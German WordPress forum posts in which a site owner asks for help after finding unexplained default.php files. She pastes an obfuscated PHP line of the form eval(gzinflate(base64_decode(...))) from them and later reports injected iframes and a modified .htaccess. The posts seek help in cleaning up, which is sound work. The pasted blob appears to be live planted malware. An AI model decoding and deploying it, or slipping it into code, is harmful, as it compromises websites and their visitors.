Beiträge von Lisa4www

    Sehr geehrte Wordpress Expeten,
    ist das ein Schadcode, ist in default.php Dateien, die ich nicht angelegt habe.
    Ich habe Decoder versucht ohne Erfolg. Offline gescannt, kein Ergebnis.
    FTP Log Dateien kein Hinweis auf fremde Zugriffe:
    Wenn es aus der DB kommen würde, wie durchsucht man diese? wo nach?
    Auf das tmp verzeichnis beim Hoster habe ich keinen Zugriff!

    <?php eval(gzinflate(base64_decode("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"))); ?>

    Besten Dank für Hinweise
    Lisa

    Luft anhalten, finde ich nicht sehr höflich, trotzdem vielen Dank!

    Nehmen wir an der Rechner ist sauber.

    Meine Fragen sind trotz der Ausführungen offen:

    Frage: die DB durchsuchen, nach ..........? eval?

    Die Dateirechte in der Standardinstallation, was kann man alles auf 444 setzen?
    (htaccess, wp-config, klar! wp-content umbenannt, usw.)

    Was ich noch immer nicht verstehe, auch aus den Log Dateien nicht ersichtlich,
    wie werden Dateien verändert, neue Dateien (zB.: default.php) erstellt,
    Witz der Sache keine fremden FTP Zugriffe.

    Logisch wäre über Plugins? Ununterbrochen scannen? mit anderen Plugin?

    Mit freundlichen Grüßen
    Lisa

    P.S.: Wenn, wer behauptet, er kennt alle Methoden, ist er ein "Wunderkind"!

    Danke vielmals, entschuldige ich habe vergessen unter FTP Logs anzumerken, dass auch der PC gescannt werden soll.
    Exploit-Seiten Links Danke, zum Antivirus Plugin:
    Jeder Wordpress Spezialist empfiehlt Update, Update nur neue Versionen oder?
    Versionsverlauf
    Version 1.3.1 vom 12.6.2012

    • Kompatibilität zu WordPress 3.4
    • Systemanforderungen: Von PHP 5.0 auf PHP 5.1
    • HiDPI-Icon für Retina-Displays
    • Entfernung des Icons aus der Sidebar

    Ich hoffe, ich kriege auch noch Antworten auf meine anderen Fragen,
    bitte um Entschuldigung, wenn ich mich nicht voll verständlich gemacht habe.
    Grüße
    Lisa

    Liebe WP FreundIn,
    in Firefox 18.0 wird diese Seite als attackierend angezeigt, in anderen Browsern nicht.
    ? Warum ?
    OK, Schadware gefunden, iframes, veränderte htaccess, zusätzliche default.php
    Selbst wenn man alle Dateien durchforstet, mit welchen Methoden auch immer,
    ist ein "Clean" fast unmöglich. Trotz aller Scanner, die angeboten werden.
    Logische Schritt: DB sichern, möchte nicht alle Beiträge verlieren.
    Alles löschen, neu installieren unter Beachtung höchstmöglicher Sicherheit
    (kenne fast alle Möglichkeite!)
    vorübergehend eine Baustellen html Datei. In den Webmastertools eine
    Überprüfung beantragen, Firefox?
    Frage: die DB durchsuchen, nach ..........? eval?
    Die Dateirechte in der Standardinstallation, was kann man alles auf 444 setzen?
    (htaccess, wp-config, klar! wp-content umbenant, usw.)
    Wenn ich nicht "hosten" würde, stünde auch die Frage, wie schotte ich in der
    Serverkonfiguratin PHP usw. ab?
    Was ich noch immer nicht verstehe, auch aus den Log Dateien nicht ersichtlich,
    wie werden Dateien verändert, neue Dateien (zB.: default.php) erstellt,
    Witz der Sache keine fremden FTP Zugriffe.
    Logisch wäre über Plugins? Ununterbrochen scannen? mit anderen Plugin?

    Fazit: WP toll - keine Frage, Sicherheits-Tipps könnten ausführlicher sein!
    Anfänger sind ziemlich verloren, Easy Install oder aus dem CPanel zaubern
    unsicheres WP hervor, ja schnell!
    Beispiel: Fast nirgendwo zu finden, welche Plugins sind gefährlich